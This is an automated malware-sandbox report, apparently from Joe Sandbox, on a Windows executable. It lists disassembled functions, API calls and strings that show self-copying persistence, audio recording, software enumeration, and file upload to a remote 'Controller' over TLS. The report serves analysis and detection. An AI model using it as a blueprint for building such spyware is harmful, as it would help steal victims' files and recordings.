stop audio, xrefs: 0041B257
" type , xrefs: 0041B0D5
pause audio, xrefs: 0041B1CA
play audio, xrefs: 0041B14B
NG, xrefs: 0041B109, 0041B08B
open ", xrefs: 0041B0D0
stopped, xrefs: 0041B202
close audio, xrefs: 0041B261

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

fmt , xrefs: 00401B2D
data, xrefs: 00401BB1
WAVE, xrefs: 00401B1D
RIFF, xrefs: 00401AFD

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe,00000001,0040764D,C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

NtAllocateVirtualMemory, xrefs: 0040729C
NtFreeVirtualMemory, xrefs: 004072B0
LdrEnumerateLoadedModules, xrefs: 004072EC
RtlAcquirePebLock, xrefs: 004072C4
RtlReleasePebLock, xrefs: 004072D8
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, xrefs: 00407271
RtlInitUnicodeString, xrefs: 0040727E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-882057332
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CE07
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
_wcslen.LIBCMT ref: 0040CEE6
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe,00000000,00000000), ref: 0040CF84
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
_wcslen.LIBCMT ref: 0040CFC6
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
ExitProcess.KERNEL32 ref: 0040D062

Strings

open, xrefs: 0040D044
del, xrefs: 0040CFF5
C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, xrefs: 0040CE91, 0040CE96, 0040CEC9, 0040CF7E, 0040CF83, 0040CF8A, 0040CFEB
6, xrefs: 0040CEDA

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe$del$open
API String ID: 1579085052-2689153522
Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32(?), ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32(?,?), ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
LoadLibraryA.KERNEL32(?), ref: 00414E17
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
FreeLibrary.KERNEL32(00000000), ref: 00414E3E
LoadLibraryA.KERNEL32(?), ref: 00414E76
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
FreeLibrary.KERNEL32(00000000), ref: 00414E8F
GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
FreeLibrary.KERNEL32(00000000), ref: 00414EB5

Strings

freeaddrinfo, xrefs: 00414DB2
IA, xrefs: 00414EDD
getnameinfo, xrefs: 00414DA2
\ws2_32, xrefs: 00414DFF
\wship6, xrefs: 00414E5E
getaddrinfo, xrefs: 00414D93, 00414E31, 00414E82

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-1941338355
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

Uniqueness

Uniqueness Score: -1.00%

Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_wcschr.LIBVCRUNTIME ref: 0044F68F
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Uniqueness

Uniqueness Score: -1.00%

Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
Sleep.KERNEL32(00000064), ref: 00412E94

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

NG, xrefs: 004130C1
0TG, xrefs: 0041314C
/stext ", xrefs: 00412BAA, 00412C4C, 00412CEE
NG, xrefs: 00412F6C
0TG, xrefs: 00413026

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

DisplayVersion, xrefs: 0041C768
UninstallString, xrefs: 0041C7A4
Publisher, xrefs: 0041C751
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
InstallLocation, xrefs: 0041C77C
InstallDate, xrefs: 0041C790
DisplayName, xrefs: 0041C73C

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445DC6
_free.LIBCMT ref: 00445DDC
_free.LIBCMT ref: 00445DED
_free.LIBCMT ref: 00445DFE
_free.LIBCMT ref: 00445E15
GetCPInfo.KERNEL32(?,?), ref: 00445E5D

Part of subcall function 00452E74: _free.LIBCMT ref: 00452EDF

_free.LIBCMT ref: 00446009
_free.LIBCMT ref: 0044601C
_free.LIBCMT ref: 0044602A
_free.LIBCMT ref: 00446035
_free.LIBCMT ref: 00446077
_free.LIBCMT ref: 0044607F
_free.LIBCMT ref: 00446087
_free.LIBCMT ref: 0044608F
_free.LIBCMT ref: 0044609D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

ReadFile error, xrefs: 00408FC8
Uploading file to Controller: , xrefs: 00408DD5
SetFilePointerEx error, xrefs: 00408FD4
NG, xrefs: 00408C17

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927

Strings

pQG, xrefs: 0040A761
pQG, xrefs: 0040A771
PG, xrefs: 0040A7AC
8SG, xrefs: 0040A802
8SG, xrefs: 0040A7F7
PG, xrefs: 0040A907

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Uniqueness

Uniqueness Score: -1.00%

Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

TLS Handshake... | , xrefs: 00404904
TLS Error 2, xrefs: 00404955
TLS Authentication Failed, xrefs: 00404999
Connection Failed: , xrefs: 00404A43
TLS Error 1, xrefs: 00404937
TLS Error 3, xrefs: 004049D8
Connection Refused, xrefs: 00404A76
PkGNG, xrefs: 004048C8

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-3229884001
Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Uniqueness

Uniqueness Score: -1.00%

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
